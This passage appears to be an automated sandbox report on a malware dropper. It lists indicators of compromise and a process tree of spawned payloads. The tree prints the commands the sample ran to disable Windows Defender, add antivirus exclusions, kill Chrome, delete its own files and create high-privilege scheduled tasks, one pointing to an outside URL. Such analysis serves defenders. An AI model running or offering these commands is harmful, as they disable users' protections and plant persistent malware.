c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f Calculator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 Calculator.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 43 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 104 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
WerFault.exepowershell.exepowershell.exeSun0324aba28588c0.exeSun03f5d51697d04.tmpWerFault.exeWerFault.exepid process 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 3548 WerFault.exe 4940 powershell.exe 4940 powershell.exe 4732 powershell.exe 4732 powershell.exe 4116 Sun0324aba28588c0.exe 4116 Sun0324aba28588c0.exe 4940 powershell.exe 4732 powershell.exe 3176 Sun03f5d51697d04.tmp 3176 Sun03f5d51697d04.tmp 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2604 Explorer.EXE -
Suspicious behavior: MapViewOfSection 16 IoCs
Processes:
Sun0324aba28588c0.exeUzYxXqOkTtDpwSezwVXY7Exr.exeextd.exewlanext.exefrbwjdafrbwjdafrbwjdafrbwjdafrbwjdapid process 4116 Sun0324aba28588c0.exe 2252 UzYxXqOkTtDpwSezwVXY7Exr.exe 2252 UzYxXqOkTtDpwSezwVXY7Exr.exe 2252 UzYxXqOkTtDpwSezwVXY7Exr.exe 2208 extd.exe 5664 wlanext.exe 5664 wlanext.exe 5664 wlanext.exe 5664 wlanext.exe 5664 wlanext.exe 5664 wlanext.exe 3412 frbwjda 7012 frbwjda 4304 frbwjda 4880 frbwjda 7128 frbwjda -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
cler.exepid process 652 cler.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Sun03d477f1a31.exeSun03ea09aa5c9686e5.exeSun0328255c4bce6fb.exeWerFault.exepowershell.exepowershell.exeDownFlSetup110.exe4.exe5.exeWerFault.exeWerFault.exeExplorer.EXE6.exedescription pid process Token: SeCreateTokenPrivilege 1180 Sun03d477f1a31.exe Token: SeAssignPrimaryTokenPrivilege 1180 Sun03d477f1a31.exe Token: SeLockMemoryPrivilege 1180 Sun03d477f1a31.exe Token: SeIncreaseQuotaPrivilege 1180 Sun03d477f1a31.exe Token: SeMachineAccountPrivilege 1180 Sun03d477f1a31.exe Token: SeTcbPrivilege 1180 Sun03d477f1a31.exe Token: SeSecurityPrivilege 1180 Sun03d477f1a31.exe Token: SeTakeOwnershipPrivilege 1180 Sun03d477f1a31.exe Token: SeLoadDriverPrivilege 1180 Sun03d477f1a31.exe Token: SeSystemProfilePrivilege 1180 Sun03d477f1a31.exe Token: SeSystemtimePrivilege 1180 Sun03d477f1a31.exe Token: SeProfSingleProcessPrivilege 1180 Sun03d477f1a31.exe Token: SeIncBasePriorityPrivilege 1180 Sun03d477f1a31.exe Token: SeCreatePagefilePrivilege 1180 Sun03d477f1a31.exe Token: SeCreatePermanentPrivilege 1180 Sun03d477f1a31.exe Token: SeBackupPrivilege 1180 Sun03d477f1a31.exe Token: SeRestorePrivilege 1180 Sun03d477f1a31.exe Token: SeShutdownPrivilege 1180 Sun03d477f1a31.exe Token: SeDebugPrivilege 1180 Sun03d477f1a31.exe Token: SeAuditPrivilege 1180 Sun03d477f1a31.exe Token: SeSystemEnvironmentPrivilege 1180 Sun03d477f1a31.exe Token: SeChangeNotifyPrivilege 1180 Sun03d477f1a31.exe Token: SeRemoteShutdownPrivilege 1180 Sun03d477f1a31.exe Token: SeUndockPrivilege 1180 Sun03d477f1a31.exe Token: SeSyncAgentPrivilege 1180 Sun03d477f1a31.exe Token: SeEnableDelegationPrivilege 1180 Sun03d477f1a31.exe Token: SeManageVolumePrivilege 1180 Sun03d477f1a31.exe Token: SeImpersonatePrivilege 1180 Sun03d477f1a31.exe Token: SeCreateGlobalPrivilege 1180 Sun03d477f1a31.exe Token: 31 1180 Sun03d477f1a31.exe Token: 32 1180 Sun03d477f1a31.exe Token: 33 1180 Sun03d477f1a31.exe Token: 34 1180 Sun03d477f1a31.exe Token: 35 1180 Sun03d477f1a31.exe Token: SeDebugPrivilege 4252 Sun03ea09aa5c9686e5.exe Token: SeDebugPrivilege 5044 Sun0328255c4bce6fb.exe Token: SeRestorePrivilege 3548 WerFault.exe Token: SeBackupPrivilege 3548 WerFault.exe Token: SeDebugPrivilege 3548 WerFault.exe Token: SeDebugPrivilege 4732 powershell.exe Token: SeDebugPrivilege 4940 powershell.exe Token: SeDebugPrivilege 3128 DownFlSetup110.exe Token: SeDebugPrivilege 2564 4.exe Token: SeDebugPrivilege 3968 5.exe Token: SeDebugPrivilege 1492 WerFault.exe Token: SeDebugPrivilege 3820 WerFault.exe Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeDebugPrivilege 68 6.exe Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeShutdownPrivilege 2604 Explorer.EXE -
Suspicious use of FindShellTrayWindow 12 IoCs
Processes:
Sun03f5d51697d04.tmpExplorer.EXECalculator.exepid process 3176 Sun03f5d51697d04.tmp 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 5576 Calculator.exe 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
yTy3pjskcaOH3SGW7DDHaAqG.exeAdobeARM.exepid process 6068 yTy3pjskcaOH3SGW7DDHaAqG.exe 5132 AdobeARM.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4824 wrote to memory of 424 4824 setup_x86_x64_install.exe setup_installer.exe PID 4824 wrote to memory of 424 4824 setup_x86_x64_install.exe setup_installer.exe PID 4824 wrote to memory of 424 4824 setup_x86_x64_install.exe setup_installer.exe PID 424 wrote to memory of 420 424 setup_installer.exe setup_install.exe PID 424 wrote to memory of 420 424 setup_installer.exe setup_install.exe PID 424 wrote to memory of 420 424 setup_installer.exe setup_install.exe PID 420 wrote to memory of 2196 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2196 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2196 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2308 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2308 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2308 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2456 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2456 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2456 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2516 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2516 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2516 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2656 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2656 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2656 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2780 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2780 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2780 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2892 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2892 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2892 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2840 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2840 420 setup_install.exe cmd.exe PID 420 wrote to memory of 2840 420 setup_install.exe cmd.exe PID 420 wrote to memory of 3880 420 setup_install.exe cmd.exe PID 420 wrote to memory of 3880 420 setup_install.exe cmd.exe PID 420 wrote to memory of 3880 420 setup_install.exe cmd.exe PID 420 wrote to memory of 4028 420 setup_install.exe cmd.exe PID 420 wrote to memory of 4028 420 setup_install.exe cmd.exe PID 420 wrote to memory of 4028 420 setup_install.exe cmd.exe PID 420 wrote to memory of 4336 420 setup_install.exe cmd.exe PID 420 wrote to memory of 4336 420 setup_install.exe cmd.exe PID 420 wrote to memory of 4336 420 setup_install.exe cmd.exe PID 2196 wrote to memory of 4732 2196 cmd.exe powershell.exe PID 2196 wrote to memory of 4732 2196 cmd.exe powershell.exe PID 2196 wrote to memory of 4732 2196 cmd.exe powershell.exe PID 2308 wrote to memory of 4940 2308 cmd.exe powershell.exe PID 2308 wrote to memory of 4940 2308 cmd.exe powershell.exe PID 2308 wrote to memory of 4940 2308 cmd.exe powershell.exe PID 420 wrote to memory of 4656 420 setup_install.exe cmd.exe PID 420 wrote to memory of 4656 420 setup_install.exe cmd.exe PID 420 wrote to memory of 4656 420 setup_install.exe cmd.exe PID 420 wrote to memory of 4620 420 setup_install.exe cmd.exe PID 420 wrote to memory of 4620 420 setup_install.exe cmd.exe PID 420 wrote to memory of 4620 420 setup_install.exe cmd.exe PID 420 wrote to memory of 4648 420 setup_install.exe cmd.exe PID 420 wrote to memory of 4648 420 setup_install.exe cmd.exe PID 420 wrote to memory of 4648 420 setup_install.exe cmd.exe PID 420 wrote to memory of 3660 420 setup_install.exe cmd.exe PID 420 wrote to memory of 3660 420 setup_install.exe cmd.exe PID 420 wrote to memory of 3660 420 setup_install.exe cmd.exe PID 4620 wrote to memory of 4252 4620 cmd.exe Sun03ea09aa5c9686e5.exe PID 4620 wrote to memory of 4252 4620 cmd.exe Sun03ea09aa5c9686e5.exe PID 3880 wrote to memory of 4116 3880 cmd.exe Sun0324aba28588c0.exe PID 3880 wrote to memory of 4116 3880 cmd.exe Sun0324aba28588c0.exe PID 3880 wrote to memory of 4116 3880 cmd.exe Sun0324aba28588c0.exe PID 2780 wrote to memory of 4204 2780 cmd.exe Sun03f0dc4460bc9.exe PID 2780 wrote to memory of 4204 2780 cmd.exe Sun03f0dc4460bc9.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\frbwjdaC:\Users\Admin\AppData\Roaming\frbwjda2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"2⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\frbwjdaC:\Users\Admin\AppData\Roaming\frbwjda2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\frbwjdaC:\Users\Admin\AppData\Roaming\frbwjda2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\frbwjdaC:\Users\Admin\AppData\Roaming\frbwjda2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\frbwjdaC:\Users\Admin\AppData\Roaming\frbwjda2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\frbwjdaC:\Users\Admin\AppData\Roaming\frbwjda2⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A101816\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03d477f1a31.exeSun03d477f1a31.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun033e271e0ce96c08.exeSun033e271e0ce96c08.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 6607⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 6767⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 6447⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 7007⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 8927⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 9407⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 11127⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03f0dc4460bc9.exeSun03f0dc4460bc9.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03f0dc4460bc9.exeC:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03f0dc4460bc9.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03e4aeb7e43a1c.exeSun03e4aeb7e43a1c.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3069764135.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3069764135.exe"C:\Users\Admin\AppData\Local\Temp\3069764135.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\4787631693.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\4787631693.exe"C:\Users\Admin\AppData\Local\Temp\4787631693.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun03e4aeb7e43a1c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03e4aeb7e43a1c.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun03e4aeb7e43a1c.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun0397381f1f458e.exeSun0397381f1f458e.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun0397381f1f458e.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun0397381f1f458e.exe" -u7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun039750b00c.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun039750b00c.exeSun039750b00c.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun0324aba28588c0.exeSun0324aba28588c0.exe6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun038aa349e3318e.exeSun038aa349e3318e.exe6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\yTy3pjskcaOH3SGW7DDHaAqG.exe"C:\Users\Admin\Pictures\Adobe Films\yTy3pjskcaOH3SGW7DDHaAqG.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\jw1BtrPSHkN5Ycj5GrGZrWNp.exe"C:\Users\Admin\Pictures\Adobe Films\jw1BtrPSHkN5Ycj5GrGZrWNp.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\jw1BtrPSHkN5Ycj5GrGZrWNp.exe"C:\Users\Admin\Pictures\Adobe Films\jw1BtrPSHkN5Ycj5GrGZrWNp.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\uecNmHuKV5CntDpX5R5cAnad.exe"C:\Users\Admin\Pictures\Adobe Films\uecNmHuKV5CntDpX5R5cAnad.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\CMCX11vCmko9R4RXJMdgUVL4.exe"C:\Users\Admin\Pictures\Adobe Films\CMCX11vCmko9R4RXJMdgUVL4.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\qk9UWVrVqY4tBN2oy63GGKMe.exe"C:\Users\Admin\Pictures\Adobe Films\qk9UWVrVqY4tBN2oy63GGKMe.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\lIJoDlCIBCCNb2IhrB3rTnjY.exe"C:\Users\Admin\Pictures\Adobe Films\lIJoDlCIBCCNb2IhrB3rTnjY.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\Pictures\Adobe Films\UjJmg_DELP1NaVeOyjr4XbfL.exe"C:\Users\Admin\Pictures\Adobe Films\UjJmg_DELP1NaVeOyjr4XbfL.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\UjJmg_DELP1NaVeOyjr4XbfL.exe"C:\Users\Admin\Pictures\Adobe Films\UjJmg_DELP1NaVeOyjr4XbfL.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\UzYxXqOkTtDpwSezwVXY7Exr.exe"C:\Users\Admin\Pictures\Adobe Films\UzYxXqOkTtDpwSezwVXY7Exr.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\xcLVIwmxi_ZLJsepaVLcueHv.exe"C:\Users\Admin\Pictures\Adobe Films\xcLVIwmxi_ZLJsepaVLcueHv.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im xcLVIwmxi_ZLJsepaVLcueHv.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\xcLVIwmxi_ZLJsepaVLcueHv.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im xcLVIwmxi_ZLJsepaVLcueHv.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\1ElQX1vnC6hzc6ozl4KylRRW.exe"C:\Users\Admin\Pictures\Adobe Films\1ElQX1vnC6hzc6ozl4KylRRW.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Users\Admin\Pictures\Adobe Films\zYHzp_ecSfHCBQQQXejKOBf6.exe"C:\Users\Admin\Pictures\Adobe Films\zYHzp_ecSfHCBQQQXejKOBf6.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\zYHzp_ecSfHCBQQQXejKOBf6.exe"C:\Users\Admin\Pictures\Adobe Films\zYHzp_ecSfHCBQQQXejKOBf6.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\d3AMh7RrYP1XgER3nYdWgVrD.exe"C:\Users\Admin\Pictures\Adobe Films\d3AMh7RrYP1XgER3nYdWgVrD.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "https://nougacoush.com/link?z=4569148" /tn "AV GORelease" /sc ONCE /st 14:8 /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\ZDAes857uiA7Ldl_tt0f6Zy7.exe"C:\Users\Admin\Pictures\Adobe Films\ZDAes857uiA7Ldl_tt0f6Zy7.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\GW1qWiZN_WfRGdqvRw1o4xI2.exe"C:\Users\Admin\Pictures\Adobe Films\GW1qWiZN_WfRGdqvRw1o4xI2.exe"7⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe9⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\dYLG3PpYw0yLWxJQRvws6jif.exe"C:\Users\Admin\Pictures\Adobe Films\dYLG3PpYw0yLWxJQRvws6jif.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\PtIpbjLSQP_eHgf86mvDiq5x.exe"C:\Users\Admin\Pictures\Adobe Films\PtIpbjLSQP_eHgf86mvDiq5x.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\EN8kVF9nOEITndkmKROPnWJy.exe"C:\Users\Admin\Pictures\Adobe Films\EN8kVF9nOEITndkmKROPnWJy.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\90ZYl4DNjc4L0AZthgxTdNOd.exe"C:\Users\Admin\Pictures\Adobe Films\90ZYl4DNjc4L0AZthgxTdNOd.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\Nvh_1uHJ5edoJRrt0aUqMKjC.exe"C:\Users\Admin\Pictures\Adobe Films\Nvh_1uHJ5edoJRrt0aUqMKjC.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\Nvh_1uHJ5edoJRrt0aUqMKjC.exe"C:\Users\Admin\Pictures\Adobe Films\Nvh_1uHJ5edoJRrt0aUqMKjC.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\BnaQE7vssOIGKiIFtluJLNOT.exe"C:\Users\Admin\Pictures\Adobe Films\BnaQE7vssOIGKiIFtluJLNOT.exe"7⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\Refutatory.exe"C:\Users\Admin\AppData\Local\Temp\Refutatory.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tory.exe"C:\Users\Admin\AppData\Local\Temp\tory.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
